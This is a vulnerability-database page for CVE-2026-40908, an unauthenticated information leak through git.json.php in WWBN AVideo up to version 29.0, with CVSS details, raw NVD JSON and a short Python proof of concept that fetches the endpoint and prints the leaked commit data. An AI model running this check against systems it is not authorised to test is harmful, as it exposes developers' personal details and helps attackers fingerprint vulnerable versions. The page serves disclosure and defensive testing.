Security Vulnerability Report
CVE-2026-40908 CVSS 5.3 MEDIUM

CVE-2026-40908

Published: 2026-04-21 20:17:03
Last Modified: 2026-04-23 19:09:58

Description

WWBN AVideo is an open source video platform. In versions 29.0 and prior, the file `git.json.php` at the web root executes `git log -1` and returns the full output as JSON to any unauthenticated user. This exposes the exact deployed commit hash (enabling version fingerprinting against known CVEs), developer names and email addresses (PII), and commit messages which may contain references to internal systems or security fixes. As of time of publication, no known patched versions are available.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
WWBN AVideo <= 29.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def check_git_leak(url):
    """
    Check if the target is vulnerable to CVE-2026-40908.
    Attempts to access git.json.php without authentication.
    """
    target = url.rstrip('/') + '/git.json.php'
    try:
        response = requests.get(target, timeout=10)
    except requests.RequestException as e:
        print(f"[!] Error occurred: {e}")
        return

    if response.status_code != 200:
        print(f"[-] File not found or access denied. Status code: {response.status_code}")
        return

    # The advisory describes the endpoint returning the `git log -1` output as JSON.
    # A bare HTTP 200 can also come from a catch-all page, so require a JSON body
    # before reporting a finding; anything else is flagged for manual review.
    try:
        body = response.json()
    except ValueError:
        print(f"[?] HTTP 200 from {target}, but the body is not JSON; inspect manually.")
        return

    print("[+] Potential Vulnerability Detected!")
    print(f"[+] Response from {target}:")
    print(body)


if __name__ == "__main__":
    target_url = "http://example.com"  # Replace with actual target
    check_git_leak(target_url)
```

References

https://github.com/WWBN/AVideo/security/advisories/GHSA-52hf-63q4-r926 - Vendor Advisory, Exploit
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40908", "sourceIdentifier": "[email protected]", "published": "2026-04-21T20:17:03.220", "lastModified": "2026-04-23T19:09:57.590", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions 29.0 and prior, the file `git.json.php` at the web root executes `git log -1` and returns the full output as JSON to any unauthenticated user. This exposes the exact deployed commit hash (enabling version fingerprinting against known CVEs), developer names and email addresses (PII), and commit messages which may contain references to internal systems or security fixes. As of time of publication, no known patched versions are available."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "29.0", "matchCriteriaId": "AC38CA07-71C1-4C86-B84A-83CF96367CBA"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-52hf-63q4-r926", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-52hf-63q4-r926", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}